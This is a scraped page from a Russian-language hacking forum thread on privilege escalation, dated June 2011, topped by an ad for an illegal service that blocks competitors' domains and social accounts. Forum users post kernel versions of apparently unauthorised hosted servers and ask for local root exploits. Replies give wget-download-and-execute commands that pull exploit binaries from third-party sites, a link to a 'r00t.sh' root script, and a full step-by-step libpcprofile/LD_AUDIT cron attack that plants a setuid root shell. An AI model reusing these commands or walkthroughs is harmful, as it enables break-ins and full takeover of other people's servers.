УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
повышение прав [задай вопрос - получи ответ]

Страница 35 из 63

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#341

24.06.2011, 13:36

sevenup

Новичок

Регистрация: 04.10.2009

Сообщений: 5

Провел на форуме:
9361

Репутация: 0

Цитата:

Сообщение от попугай

попугай said:
2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686
Есть что-нибудь под это?

wget http://www.interiordelduque.com/userfiles/image/2.6.18

chmod +x 2.6.18

./2.6.18

#342

25.06.2011, 01:16

Vald

Познающий

Регистрация: 06.08.2009

Сообщений: 74

Провел на форуме:
344782

Репутация: 14

Linux hosting 2.6.26-1-686 #1 SMP Fri Mar 13 18:08:45 UTC 2009 i686

Под это есть что-то?

#343

25.06.2011, 02:05

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от sevenup

sevenup said:
wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8
chmod +x 2.6.9-55-2007-prv8
./2.6.9-55-2007-prv8

sh: ./2.6.9-55-2007-prv8: cannot execute binary file

Мне бы 2.6.9-89.0.23.EL #1 Wed Mar 17 06:22:05 EDT 2010 i686 пробить.

#344

25.06.2011, 13:26

sevenup

Новичок

Регистрация: 04.10.2009

Сообщений: 5

Провел на форуме:
9361

Репутация: 0

Цитата:

Сообщение от Vald

Vald said:
Linux hosting 2.6.26-1-686 #1 SMP Fri Mar 13 18:08:45 UTC 2009 i686
Под это есть что-то?

ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;

ответ сервера покажи

Цитата:

Сообщение от попугай

попугай said:
sh: ./2.6.9-55-2007-prv8: cannot execute binary file
Мне бы 2.6.9-89.0.23.EL #1 Wed Mar 17 06:22:05 EDT 2010 i686 пробить.

ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;

ответ сервера покажи

#345

25.06.2011, 13:55

Vald

Познающий

Регистрация: 06.08.2009

Сообщений: 74

Провел на форуме:
344782

Репутация: 14

$ ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;

total 26948

3637249 drwxr-xr-x 3 root root 4096 Apr 8 2009 .

2 drwxr-xr-x 24 root root 4096 Apr 8 2009 ..

3637250 -rw-r--r-- 1 root root 723178 Feb 11 2008 System.map-2.6.18-6-686

3637268 -rw-r--r-- 1 root root 928033 Mar 14 2009 System.map-2.6.26-1-686

3637251 -rw-r--r-- 1 root root 70682 Feb 11 2008 config-2.6.18-6-686

3637269 -rw-r--r-- 1 root root 91640 Mar 14 2009 config-2.6.26-1-686

3637254 drwxr-xr-x 2 root root 4096 Apr 8 2009 grub

3637267 -rw-r--r-- 1 root root 5259149 Apr 8 2009 initrd.img-2.6.18-6-686

3637266 -rw-r--r-- 1 root root 5259970 Apr 8 2009 initrd.img-2.6.18-6-686.bak

3637272 -rw-r--r-- 1 root root 6194894 Apr 8 2009 initrd.img-2.6.26-1-686

3637270 -rw-r--r-- 1 root root 6194909 Apr 8 2009 initrd.img-2.6.26-1-686.bak

3637252 -rw-r--r-- 1 root root 1260861 Feb 11 2008 vmlinuz-2.6.18-6-686

3637253 -rw-r--r-- 1 root root 1506512 Mar 14 2009 vmlinuz-2.6.26-1-686

12697846 -rw-r--r-- 1 root root 5440 Jan 4 2009 /lib/libpcprofile.so

12697768 -rwxr-xr-x 1 root root 113248 Jan 4 2009 /lib/ld-2.7.so

12697649 lrwxrwxrwx 1 root root 9 Apr 8 2009 /lib/ld-linux.so.2 -> ld-2.7.so

#346

25.06.2011, 18:22

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от sevenup

sevenup said:
ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
ответ сервера покажи

total 55852

2 drwxr-xr-x 4 root root 8192 Mar 3 06:11 .

2 drwxr-xr-x 27 root root 4096 Jun 8 01:19 ..

6036 -rw-r--r-- 1 root root 770652 Feb 18 08:41 System.map-2.6.9-100.EL

14 -rw-r--r-- 1 root root 749462 Aug 12 2006 System.map-2.6.9-42.EL

18 -rw-r--r-- 1 root root 754505 Jun 26 2007 System.map-2.6.9-55.0.2.EL

6031 -rw-r--r-- 1 root root 754717 Sep 28 2007 System.map-2.6.9-55.0.9.EL

10042 -rw-r--r-- 1 root root 759989 Dec 19 2007 System.map-2.6.9-67.0.1.EL

10062 -rw-r--r-- 1 root root 760559 Jul 24 2008 System.map-2.6.9-67.0.22.EL

10047 -rw-r--r-- 1 root root 759989 Feb 3 2008 System.map-2.6.9-67.0.4.EL

10087 -rw-r--r-- 1 root root 780664 May 1 2009 System.map-2.6.9-78.0.22.EL

10077 -rw-r--r-- 1 root root 780400 Nov 20 2008 System.map-2.6.9-78.0.8.EL

2009 -rw-r--r-- 1 root root 768660 Nov 4 2009 System.map-2.6.9-89.0.16.EL

2019 -rw-r--r-- 1 root root 768688 Jan 8 2010 System.map-2.6.9-89.0.19.EL

2029 -rw-r--r-- 1 root root 768822 Mar 17 2010 System.map-2.6.9-89.0.23.EL

2034 -rw-r--r-- 1 root root 768853 May 6 2010 System.map-2.6.9-89.0.25.EL

2039 -rw-r--r-- 1 root root 768881 Aug 20 2010 System.map-2.6.9-89.0.28.EL

10097 -rw-r--r-- 1 root root 768504 Aug 24 2009 System.map-2.6.9-89.0.9.EL

2049 -rw-r--r-- 1 root root 768881 Sep 28 2010 System.map-2.6.9-89.29.1.EL

2054 -rw-r--r-- 1 root root 769059 Oct 20 2010 System.map-2.6.9-89.31.1.EL

2059 -rw-r--r-- 1 root root 769059 Dec 2 2010 System.map-2.6.9-89.33.1.EL

6027 -rw-r--r-- 1 root root 769061 Jan 19 01:06 System.map-2.6.9-89.35.1.EL

6025 -rwxr--r-- 1 root root 6144 Jul 30 2007 aquota.user

6037 -rw-r--r-- 1 root root 51676 Feb 18 08:41 config-2.6.9-100.EL

15 -rw-r--r-- 1 root root 50333 Aug 12 2006 config-2.6.9-42.EL

19 -rw-r--r-- 1 root root 50432 Jun 26 2007 config-2.6.9-55.0.2.EL

6032 -rw-r--r-- 1 root root 50432 Sep 28 2007 config-2.6.9-55.0.9.EL

10043 -rw-r--r-- 1 root root 50924 Dec 19 2007 config-2.6.9-67.0.1.EL

10063 -rw-r--r-- 1 root root 50925 Jul 24 2008 config-2.6.9-67.0.22.EL

10048 -rw-r--r-- 1 root root 50924 Feb 3 2008 config-2.6.9-67.0.4.EL

10088 -rw-r--r-- 1 root root 51502 May 1 2009 config-2.6.9-78.0.22.EL

10078 -rw-r--r-- 1 root root 51501 Nov 20 2008 config-2.6.9-78.0.8.EL

2010 -rw-r--r-- 1 root root 51614 Nov 4 2009 config-2.6.9-89.0.16.EL

2020 -rw-r--r-- 1 root root 51614 Jan 8 2010 config-2.6.9-89.0.19.EL

2030 -rw-r--r-- 1 root root 51614 Mar 17 2010 config-2.6.9-89.0.23.EL

2035 -rw-r--r-- 1 root root 51645 May 6 2010 config-2.6.9-89.0.25.EL

2040 -rw-r--r-- 1 root root 51645 Aug 20 2010 config-2.6.9-89.0.28.EL

18073 -rw-r--r-- 1 root root 51613 Aug 24 2009 config-2.6.9-89.0.9.EL

2050 -rw-r--r-- 1 root root 51645 Sep 28 2010 config-2.6.9-89.29.1.EL

2055 -rw-r--r-- 1 root root 51645 Oct 20 2010 config-2.6.9-89.31.1.EL

2060 -rw-r--r-- 1 root root 51645 Dec 2 2010 config-2.6.9-89.33.1.EL

6028 -rw-r--r-- 1 root root 51645 Jan 19 01:06 config-2.6.9-89.35.1.EL

12049 drwxr-xr-x 2 root root 1024 Mar 3 06:11 grub

6040 -rw-r--r-- 1 root root 593873 Mar 3 06:11 initrd-2.6.9-100.EL.img

17 -rw-r--r-- 1 root root 399475 Jul 28 2007 initrd-2.6.9-42.EL.img

21 -rw-r--r-- 1 root root 588215 Jul 28 2007 initrd-2.6.9-55.0.2.EL.img

6034 -rw-r--r-- 1 root root 588204 Sep 29 2007 initrd-2.6.9-55.0.9.EL.img

10046 -rw-r--r-- 1 root root 592220 Dec 22 2007 initrd-2.6.9-67.0.1.EL.img

10066 -rw-r--r-- 1 root root 592219 Jul 25 2008 initrd-2.6.9-67.0.22.EL.img

10051 -rw-r--r-- 1 root root 592222 Feb 5 2008 initrd-2.6.9-67.0.4.EL.img

10091 -rw-r--r-- 1 root root 592902 Jun 8 2009 initrd-2.6.9-78.0.22.EL.img

10081 -rw-r--r-- 1 root root 592859 Nov 21 2008 initrd-2.6.9-78.0.8.EL.img

2013 -rw-r--r-- 1 root root 593352 Nov 5 2009 initrd-2.6.9-89.0.16.EL.img

2023 -rw-r--r-- 1 root root 593344 Jan 10 2010 initrd-2.6.9-89.0.19.EL.img

2033 -rw-r--r-- 1 root root 593542 Mar 21 2010 initrd-2.6.9-89.0.23.EL.img

2038 -rw-r--r-- 1 root root 593530 May 9 2010 initrd-2.6.9-89.0.25.EL.img

2043 -rw-r--r-- 1 root root 593592 Aug 24 2010 initrd-2.6.9-89.0.28.EL.img

18076 -rw-r--r-- 1 root root 593358 Aug 26 2009 initrd-2.6.9-89.0.9.EL.img

2053 -rw-r--r-- 1 root root 593576 Sep 30 2010 initrd-2.6.9-89.29.1.EL.img

2058 -rw-r--r-- 1 root root 593565 Oct 21 2010 initrd-2.6.9-89.31.1.EL.img

2063 -rw-r--r-- 1 root root 593569 Jan 12 05:52 initrd-2.6.9-89.33.1.EL.img

6035 -rw-r--r-- 1 root root 593570 Jan 21 05:36 initrd-2.6.9-89.35.1.EL.img

11 drwx------ 2 root root 12288 Jul 28 2007 lost+found

12 -rw-r--r-- 1 root root 9371 Aug 13 2006 message

13 -rw-r--r-- 1 root root 9371 Aug 13 2006 message.ja

6026 -rwxr--r-- 1 root root 32 Jul 30 2007 quota.user

6038 -rw-r--r-- 1 root root 67797 Feb 18 08:41 symvers-2.6.9-100.EL.gz

10044 -rw-r--r-- 1 root root 64308 Dec 19 2007 symvers-2.6.9-67.0.1.EL.gz

10064 -rw-r--r-- 1 root root 64329 Jul 24 2008 symvers-2.6.9-67.0.22.EL.gz

10049 -rw-r--r-- 1 root root 64308 Feb 3 2008 symvers-2.6.9-67.0.4.EL.gz

10089 -rw-r--r-- 1 root root 66266 May 1 2009 symvers-2.6.9-78.0.22.EL.gz

10079 -rw-r--r-- 1 root root 66235 Nov 20 2008 symvers-2.6.9-78.0.8.EL.gz

2011 -rw-r--r-- 1 root root 67596 Nov 4 2009 symvers-2.6.9-89.0.16.EL.gz

2021 -rw-r--r-- 1 root root 67596 Jan 8 2010 symvers-2.6.9-89.0.19.EL.gz

2031 -rw-r--r-- 1 root root 67606 Mar 17 2010 symvers-2.6.9-89.0.23.EL.gz

2036 -rw-r--r-- 1 root root 67650 May 6 2010 symvers-2.6.9-89.0.25.EL.gz

2041 -rw-r--r-- 1 root root 67650 Aug 20 2010 symvers-2.6.9-89.0.28.EL.gz

18074 -rw-r--r-- 1 root root 67596 Aug 24 2009 symvers-2.6.9-89.0.9.EL.gz

2051 -rw-r--r-- 1 root root 67650 Sep 28 2010 symvers-2.6.9-89.29.1.EL.gz

2056 -rw-r--r-- 1 root root 67667 Oct 20 2010 symvers-2.6.9-89.31.1.EL.gz

2061 -rw-r--r-- 1 root root 67701 Dec 2 2010 symvers-2.6.9-89.33.1.EL.gz

6029 -rw-r--r-- 1 root root 67701 Jan 19 01:07 symvers-2.6.9-89.35.1.EL.gz

6039 -rw-r--r-- 1 root root 1538264 Feb 18 08:41 vmlinuz-2.6.9-100.EL

16 -rw-r--r-- 1 root root 1504101 Aug 12 2006 vmlinuz-2.6.9-42.EL

20 -rw-r--r-- 1 root root 1511833 Jun 26 2007 vmlinuz-2.6.9-55.0.2.EL

6033 -rw-r--r-- 1 root root 1511602 Sep 28 2007 vmlinuz-2.6.9-55.0.9.EL

10045 -rw-r--r-- 1 root root 1518785 Dec 19 2007 vmlinuz-2.6.9-67.0.1.EL

10065 -rw-r--r-- 1 root root 1519323 Jul 24 2008 vmlinuz-2.6.9-67.0.22.EL

10050 -rw-r--r-- 1 root root 1518757 Feb 3 2008 vmlinuz-2.6.9-67.0.4.EL

10090 -rw-r--r-- 1 root root 1545940 May 1 2009 vmlinuz-2.6.9-78.0.22.EL

10080 -rw-r--r-- 1 root root 1545983 Nov 20 2008 vmlinuz-2.6.9-78.0.8.EL

2012 -rw-r--r-- 1 root root 1536244 Nov 4 2009 vmlinuz-2.6.9-89.0.16.EL

2022 -rw-r--r-- 1 root root 1536247 Jan 8 2010 vmlinuz-2.6.9-89.0.19.EL

2032 -rw-r--r-- 1 root root 1536228 Mar 17 2010 vmlinuz-2.6.9-89.0.23.EL

2037 -rw-r--r-- 1 root root 1536380 May 6 2010 vmlinuz-2.6.9-89.0.25.EL

2042 -rw-r--r-- 1 root root 1536716 Aug 20 2010 vmlinuz-2.6.9-89.0.28.EL

18075 -rw-r--r-- 1 root root 1533159 Aug 24 2009 vmlinuz-2.6.9-89.0.9.EL

2052 -rw-r--r-- 1 root root 1536664 Sep 28 2010 vmlinuz-2.6.9-89.29.1.EL

2057 -rw-r--r-- 1 root root 1536908 Oct 20 2010 vmlinuz-2.6.9-89.31.1.EL

2062 -rw-r--r-- 1 root root 1536830 Dec 2 2010 vmlinuz-2.6.9-89.33.1.EL

6030 -rw-r--r-- 1 root root 1536995 Jan 19 01:06 vmlinuz-2.6.9-89.35.1.EL

131202 lrwxrwxrwx 1 root root 16 Dec 17 2007 /lib/libpcre.so.0 -> libpcre.so.0.0.1

133814 -rwxr-xr-x 1 root root 65560 Nov 29 2007 /lib/libpcre.so.0.0.1

131074 -rwxr-xr-x 1 root root 112212 Feb 18 02:45 /lib/ld-2.3.4.so

132966 lrwxrwxrwx 1 root root 11 Mar 3 01:22 /lib/ld-linux.so.2 -> ld-2.3.4.so

132951 lrwxrwxrwx 1 root root 13 Jul 28 2007 /lib/ld-lsb.so.3 -> ld-linux.so.2

#347

25.06.2011, 18:23

sevenup

Новичок

Регистрация: 04.10.2009

Сообщений: 5

Провел на форуме:
9361

Репутация: 0

Цитата:

Сообщение от Vald

Vald said:
$ ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
total 26948
3637249 drwxr-xr-x 3 root root 4096 Apr 8 2009 .
2 drwxr-xr-x 24 root root 4096 Apr 8 2009 ..
3637250 -rw-r--r-- 1 root root 723178 Feb 11 2008 System.map-2.6.18-6-686
3637268 -rw-r--r-- 1 root root 928033 Mar 14 2009 System.map-2.6.26-1-686
3637251 -rw-r--r-- 1 root root 70682 Feb 11 2008 config-2.6.18-6-686
3637269 -rw-r--r-- 1 root root 91640 Mar 14 2009 config-2.6.26-1-686
3637254 drwxr-xr-x 2 root root 4096 Apr 8 2009 grub
3637267 -rw-r--r-- 1 root root 5259149 Apr 8 2009 initrd.img-2.6.18-6-686
3637266 -rw-r--r-- 1 root root 5259970 Apr 8 2009 initrd.img-2.6.18-6-686.bak
3637272 -rw-r--r-- 1 root root 6194894 Apr 8 2009 initrd.img-2.6.26-1-686
3637270 -rw-r--r-- 1 root root 6194909 Apr 8 2009 initrd.img-2.6.26-1-686.bak
3637252 -rw-r--r-- 1 root root 1260861 Feb 11 2008 vmlinuz-2.6.18-6-686
3637253 -rw-r--r-- 1 root root 1506512 Mar 14 2009 vmlinuz-2.6.26-1-686
12697846 -rw-r--r-- 1 root root 5440 Jan 4 2009 /lib/libpcprofile.so
12697768 -rwxr-xr-x 1 root root 113248 Jan 4 2009 /lib/ld-2.7.so
12697649 lrwxrwxrwx 1 root root 9 Apr 8 2009 /lib/ld-linux.so.2 -> ld-2.7.so

Скачай архив:

Код:

Code:
http://files.webi.ru/m_down/r00t.rar.html

файл с архива r00t.sh закачай на сервер и выполни следующие команды:

Код:

Code:
1. chmod +x r00t.sh
2. ./r00t.sh

3. whoami

в ответ получишь:

root

#348

25.06.2011, 18:25

sevenup

Новичок

Регистрация: 04.10.2009

Сообщений: 5

Провел на форуме:
9361

Репутация: 0

Цитата:

Сообщение от попугай

попугай said:
total 55852
2 drwxr-xr-x 4 root root 8192 Mar 3 06:11 .
2 drwxr-xr-x 27 root root 4096 Jun 8 01:19 ..
6036 -rw-r--r-- 1 root root 770652 Feb 18 08:41 System.map-2.6.9-100.EL
14 -rw-r--r-- 1 root root 749462 Aug 12 2006 System.map-2.6.9-42.EL
18 -rw-r--r-- 1 root root 754505 Jun 26 2007 System.map-2.6.9-55.0.2.EL
6031 -rw-r--r-- 1 root root 754717 Sep 28 2007 System.map-2.6.9-55.0.9.EL
132966 lrwxrwxrwx 1 root root 11 Mar 3 01:22 /lib/ld-linux.so.2 -> ld-2.3.4.so
132951 lrwxrwxrwx 1 root root 13 Jul 28 2007 /lib/ld-lsb.so.3 -> ld-linux.so.2

не пробить

#349

28.06.2011, 14:16

Vald

Познающий

Регистрация: 06.08.2009

Сообщений: 74

Провел на форуме:
344782

Репутация: 14

sh-3.2$ ./r00t.sh

./r00t.sh: line 30: gcc: command not found

./r00t.sh: line 42: gcc: command not found

./r00t.sh: line 43: gcc: command not found

./r00t.sh: line 48: ./sh: No such file or directory

Вот что получаю в ответ.

#350

29.06.2011, 13:40

sevenup

Новичок

Регистрация: 04.10.2009

Сообщений: 5

Провел на форуме:
9361

Репутация: 0

Цитата:

Сообщение от Vald

Vald said:
sh-3.2$ ./r00t.sh
./r00t.sh: line 30: gcc: command not found
./r00t.sh: line 42: gcc: command not found
./r00t.sh: line 43: gcc: command not found
./r00t.sh: line 48: ./sh: No such file or directory
Вот что получаю в ответ.

на сервере нет gcc...он скомпилировать сплойт не может

Вот вариант, в котором gcc не нужен:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]Убираем маску прав доступа для создаваемых файлов[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]при umask 0 файлы будут создаваться по умолчанию с правами[/COLOR][COLOR="#DD0000"]"-rw-rw-rw-"[/COLOR][COLOR="#007700"])

   $[/COLOR][COLOR="#0000BB"]umask 0

Для атаки будем использовать стандартную библиотеку профилирования libpcprofile[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]входящую в комплект libc[/COLOR][COLOR="#007700"]:

   $[/COLOR][COLOR="#0000BB"]dpkg[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]S[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lib[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]libpcprofile[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]so

   libc6[/COLOR][COLOR="#007700"]: /[/COLOR][COLOR="#0000BB"]lib[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]libpcprofile[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]so

[/COLOR][COLOR="#007700"]$[/COLOR][COLOR="#0000BB"]ls[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]l[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lib[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]libpcprofile[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]so

[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]rw[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]r[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]1 root root 5496 2010[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]12 03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]32[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lib[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]libpcprofile[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]so

Код инициализации libpcprofile не проверяет различия эффективного и текущего идентификатора пользователя[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]но при этом позволяет создать лог[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]файл[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]который можно создать в любой системной директории[/COLOR][COLOR="#007700"]:

   $[/COLOR][COLOR="#0000BB"]LD_AUDIT[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"libpcprofile.so"[/COLOR][COLOR="#0000BB"]PCPROFILE_OUTPUT[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"/etc/cron.d/exploit"[/COLOR][COLOR="#0000BB"]ping

   ERROR[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]ld[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]so[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]object[/COLOR][COLOR="#DD0000"]'libpcprofile.so'[/COLOR][COLOR="#0000BB"]cannot be loaded[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]audit[/COLOR][COLOR="#007700"]interface:[/COLOR][COLOR="#0000BB"]undefined symbol[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]la_version[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]ignored[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#0000BB"]Несмотря на вывод ошибки[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]процедура инициализации выполнилась и в директории[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]cron[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d был создан лог[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]файл[/COLOR][COLOR="#007700"]:

   $[/COLOR][COLOR="#0000BB"]ls[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]l[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]cron[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]exploit

[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]rw[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]rw[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]rw[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]1 root taviso 65 2010[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]21 14[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]cron[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]exploit

Как видно[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]права доступа на созданный файл[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]позволяют любому пользователю записать в него любые данные[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]которые затем будут выполнены системой cron от пользователя root[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Например[/COLOR][COLOR="#007700"]:

   $[/COLOR][COLOR="#0000BB"]printf[/COLOR][COLOR="#DD0000"]"* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n"[/COLOR][COLOR="#007700"]> /[/COLOR][COLOR="#0000BB"]etc[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]cron[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]exploit

Через пару минут наблюдаем[/COLOR][COLOR="#007700"]:

   $[/COLOR][COLOR="#0000BB"]ls[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]l[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]exploit

   ls[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]cannot access[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]exploit[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]No such file[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]directory

[/COLOR][COLOR="#007700"]...

   $[/COLOR][COLOR="#0000BB"]ls[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]l[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]exploit

[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]rwsr[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]xr[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]x 1 root root 83888 2010[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]21 14[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]exploit

[/COLOR][COLOR="#007700"]$ /[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]exploit

[/COLOR][COLOR="#FF8000"]# whoami

[/COLOR][COLOR="#0000BB"]root

[/COLOR][/COLOR]

Если команда dpkg поддерживается то порутаешь...

Страница 35 из 63

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход